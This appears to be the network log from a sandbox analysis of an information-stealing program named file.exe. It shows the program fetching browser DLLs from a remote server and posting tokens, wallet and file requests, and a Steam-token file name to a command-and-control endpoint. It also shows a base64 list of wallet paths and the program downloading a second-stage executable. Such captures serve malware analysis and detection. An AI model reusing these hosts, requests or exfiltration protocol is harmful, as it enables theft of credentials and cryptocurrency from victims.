Nov 23, 2024 07:09:41.227133036 CET	1236	IN	Data Raw: 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb 00 01 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8 Data Ascii: hh !Vf.@uVuW)9wSuWT>\>=t%>>fM1^_[]U}th
Nov 23, 2024 07:09:41.227247953 CET	1236	IN	Data Raw: 01 85 c0 89 4d c8 0f 84 ef 01 00 00 89 d1 83 e1 fe 66 0f 6f 05 c0 20 08 10 31 f6 66 0f ef c9 66 0f ef d2 8b 7d 10 8b 5d cc 0f 1f 80 00 00 00 00 89 f0 09 d8 66 0f 6e 34 07 66 0f ef db 66 0f 60 f3 66 0f 61 f3 66 0f 6f f8 66 0f 72 f7 17 66 0f 6f 1d Data Ascii: Mfo 1ff}]fn4ff`fafofrfo f[fpffpffof% fpfpfbfnlff`fafffrf% [fpffpfpffpfbffof fnf`f
Nov 23, 2024 07:09:41.235523939 CET	1236	IN	Data Raw: 8a 34 30 88 34 38 88 14 30 00 d6 0f b6 f6 8a 75 e8 8b 7d e4 8a 54 0f ff 32 14 30 8b 45 dc 88 54 08 ff 8b 45 d8 01 c8 83 c0 01 83 c1 01 83 f8 01 75 ba 8b 45 f0 88 98 00 01 00 00 88 b0 01 01 00 00 31 c0 83 c4 34 5e 5f 5b 5d c3 0f b6 d2 89 55 ec 89 Data Ascii: 40480u}T20ETEuE14^_[]UM1]U}f.MMuEMMU2}E0MEEMLEE0}M1M
Nov 23, 2024 07:09:42.845854998 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:43.291857958 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 23, 2024 07:09:44.188060045 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:44.633769035 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 23, 2024 07:09:45.486865997 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:45.932385921 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 23, 2024 07:09:49.226725101 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:49.672385931 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:49 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 23, 2024 07:09:50.378298998 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 23, 2024 07:09:50.824464083 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 23, 2024 07:09:51.459045887 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG Host: 185.215.113.206 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Nov 23, 2024 07:09:52.573954105 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:52.662600040 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"wallets------GIJKKKFCFHCFIECBGDHI--
Nov 23, 2024 07:09:53.111903906 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:52 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 23, 2024 07:09:53.114712954 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 2d 2d 0d 0a Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="message"files------DGDAEHCBGIIJJJJKKKEH--
Nov 23, 2024 07:09:53.562542915 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:53.578649044 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJE Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="file"------DAAECAFHDBGIDGCAEHJE--
Nov 23, 2024 07:09:54.525132895 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 23, 2024 07:09:54.529603958 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCA Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="message"ybncbhylepme------GIJECGDGCBKECAKFBGCA--
Nov 23, 2024 07:09:54.977370024 CET	271	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49944	185.215.113.16	80	2128	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:09:55.102026939 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 23, 2024 07:09:56.551418066 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 23 Nov 2024 06:09:56 GMT Content-Type: application/octet-stream Content-Length: 1931776 Last-Modified: Sat, 23 Nov 2024 06:06:24 GMT Connection: keep-alive ETag: "674170e0-1d7a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfL@LZ@WkHkLkL @.rsrcH@.idata @ `+@sxkyywio`2\@kanpqnsypLT@.taggant0L"X@
Nov 23, 2024 07:09:56.551456928 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:09:56.551469088 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
